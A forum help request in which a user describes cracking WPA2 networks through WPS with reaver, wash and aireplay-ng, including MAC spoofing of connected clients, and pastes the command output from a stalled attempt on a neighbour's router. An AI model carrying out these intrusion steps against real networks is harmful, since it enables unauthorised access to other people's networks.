I have successfully cracked a WPA2 network at work using reaver. Of course, in order to see if it is locked I had to check it with wash; I was able to do this only after mkdir /etc/reaver/.
However, when I'm trying to breach my neighbour (who's aware of this), this is the result of wash:
Code:
root@kali:~# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
BSSID Channel RSSI WPS Version WPS Locked ESSID
--------------------------------------------------------------------------------------------------------------
And the result of airodump-ng mon0 -c 1:
Code:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:12:xx:xx:xx:xx -51 100 86 0 0 1 54e. WPA2 CCMP PSK xxxxxxxxx
The standard Reaver command results in "Switching mon0 to channel 1", which lasts forever.
Code:
root@kali:~# reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Switching mon0 to channel 1
Then I'm going more hardcore with -L and -A and I get to another infinite loop:
Code:
root@kali:~# reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv -L -A
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Switching mon0 to channel 1
[+] Associated with xx:xx:xx:xx:xx (ESSID: xxxxxxxxxxxxxx)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
I've tested tons of variations, still nothing.
Aireplay-ng -9 mon0 results:
Code:
root@kali:~# aireplay-ng -9 mon0
10:49:41 Trying broadcast probe requests...
10:49:41 Injection is working!
10:49:42 Found 1 AP
10:49:42 Trying directed probe requests...
10:49:42 00:xx:xx:xx:xx:xx - channel: 1 - 'xxxxxxxxx'
10:49:43 Ping (min/avg/max): 1.553ms/9.367ms/124.480ms Power: -72.50
10:49:43 30/30: 100%
Aireplay injection test
aireplay-ng -9 -e xxxxxx -a 00:xx:xx:xx:xx:xx -i wlan1 wlan0
Code:
root@kali:~# aireplay-ng -9 -e xxxxxxxxxxxx -a 0x:xx:xx:xx:xx:xx -i wlan1 wlan0
10:55:01 Waiting for beacon frame (BSSID: 00:xx:xx:xx:xx:xx) on channel 1
10:55:01 Trying broadcast probe requests...
10:55:01 Injection is working!
10:55:03 Found 1 AP
10:55:03 Trying directed probe requests...
10:55:03 xx:xx:xx:xx:xx:xx - channel: 1 - 'xxxxxxxxx'
10:55:03 Ping (min/avg/max): 1.134ms/8.493ms/73.599ms Power: -39.57
10:55:03 30/30: 100%
10:55:03 Trying card-to-card injection...
10:55:03 Attack -0: OK
10:55:03 Attack -1 (open): OK
10:55:03 Attack -1 (psk): OK
10:55:03 Attack -2/-3/-4/-6: OK
10:55:03 Attack -5/-7: OK
And I can't do anything about it...
I'm using 2 wireless cards, Atheros AR9285 and Atheros AR9271.
airmon-ng check kill doesn't help either.
Spoofing the card's MAC (I've got the MAC of 2 PCs which are connected to this network, tried to reaver it when they were disconnected) on both wlan0/mon0 and wlan1 and adding --mac=spoofedmac in reaver doesn't give me anything new.
I have also tried to update:
apt-get install libcap-dev
apt-get install libsqlite3-dev
Any suggestions?